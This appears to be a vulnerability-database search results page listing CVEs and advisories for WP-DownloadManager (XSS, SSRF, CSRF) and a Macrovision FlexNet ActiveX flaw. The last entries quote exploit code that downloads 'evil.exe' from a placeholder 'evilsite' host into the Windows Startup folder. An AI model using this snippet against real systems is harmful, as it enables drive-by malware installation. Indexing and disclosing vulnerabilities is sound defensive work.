79 matches found
CVE-2022-25606
Multiple Authenticated Stored Cross-Site Scripting XSS vulnerabilities discovered in WP-DownloadManager WordPress plugin versions = 1.68.6. Vulnerable parameters path, pathurl, pageurl, categories...
WordPress WP-DownloadManager plugin <= 1.68.5 - Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities
Multiple Authenticated Stored Cross-Site Scripting XSS vulnerabilities discovered by Ex.Mi Patchstack in WordPress WP-DownloadManager plugin versions = 1.68.5. Solution Update the WordPress WP-DownloadManager plugin to the latest available version at least 1.68.6...
WP-DownloadManager < 1.68.7 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting...
WordPress WP-DownloadManager plugin <= 1.68.6 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability
Authenticated Reflected Cross-Site Scripting XSS vulnerability discovered by Ngo Van Thien in WordPress WP-DownloadManager plugin versions = 1.68.6. Solution Update the WordPress WP-DownloadManager plugin to the latest available version at least 1.68.7...
CVE-2020-24141
Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the fileremote parameter to download-add.php. It can help identify open ports, local network hosts and execute...
Server side request forgery (ssrf)
Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the fileremote parameter to download-add.php. It can help identify open ports, local network hosts and execute...
CVE-2020-24141
Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the fileremote parameter to download-add.php. It can help identify open ports, local network hosts and execute...
CVE-2020-24141
CVE-2020-24141 is a server-side request forgery (SSRF) vulnerability in the WordPress WP-DownloadManager plugin, reported for version 1.68.4. The issue arises from the file_remote parameter in download-add.php, enabling an attacker to issue crafted requests from the vulnerable site’s back-end ser...
WP-DownloadManager < 1.68.5 - Server-Side Request Forgery (SSRF)
The plugin before version 1.68.5 is vulnerable to server-side request forgery SSRF attacks. This could allow an attacker identify open ports, network hosts and access web resources on a non-public facing network...
CVE-2013-2697
Cross-site request forgery CSRF vulnerability in the WP-DownloadManager plugin before 1.61 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences...
Cross site request forgery (csrf)
Cross-site request forgery CSRF vulnerability in the WP-DownloadManager plugin before 1.61 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences...
CVE-2013-2697
Cross-site request forgery CSRF vulnerability in the WP-DownloadManager plugin before 1.61 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences...
CVE-2013-2697
CVE-2013-2697 is a CSRF vulnerability in the WP-DownloadManager WordPress plugin prior to 1.61. The issue allows remote attackers to hijack the authentication of arbitrary users by sending requests that insert XSS sequences, as described across multiple sources. Affected product: WordPress plugin...
CVE-2008-4587
CVE-2008-4587 describes an insecure method vulnerability in the MSVNClientDownloadManager61Lib.DownloadManager.1 ActiveX control (ISDM.exe 6.1.100.61372) of Macrovision FLEXnet Connect 6.1. An attacker could force the download and execution of arbitrary files via AddFile and RunScheduledJobs, wit...
Macrovision FlexNet DownloadManager Insecure Methods Exploit
No description provided by source. !-- Macrovision FlexNet DownloadManager Insecure Methods Exploit Implemented Categories: Category: Safe for Scripting Written by e.b. Tested on Windows XP SP2fully patched English, IE6, ISDM.exe version 6.1.100.61372 -- html head titleMacrovision FlexNet...
[Full-disclosure] Macrovision FlexNet Connect DownloadManager Insecure Methods
Who: Macrovision What: Macrovision FlexNext Connect is a software package that allows ISV's to update their software products. It is generally used in conjunction with the InstallShield software deploymnet framework. FlexNet uses a number of ActiveX controls, some of which are marked safe for...
Macrovision FlexNet DownloadManager Insecure Methods Exploit
Exploit for unknown platform in category remote exploits ============================================================ Macrovision FlexNet DownloadManager Insecure Methods Exploit ============================================================ Macrovision FlexNet DownloadManager Insecure Methods...
Macrovision FlexNet DownloadManager - Insecure Methods
Macrovision FlexNet DownloadManager - Insecure Methods Macrovision FlexNet DownloadManager Insecure Methods Exploit function Check var mJob = obj.CreateJob"SomeJob",0,"11111111-1111-1111-1111-111111111111"; mJob.AddFile"http://www.evilsite/evil.exe","C:\Documents and Settings\All Users\Start...
Macrovision FlexNet DownloadManager - Insecure Methods
Macrovision FlexNet DownloadManager Insecure Methods Exploit function Check var mJob = obj.CreateJob"SomeJob",0,"11111111-1111-1111-1111-111111111111"; mJob.AddFile"http://www.evilsite/evil.exe","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\harmless.exe"; mJob.SetPriority0;...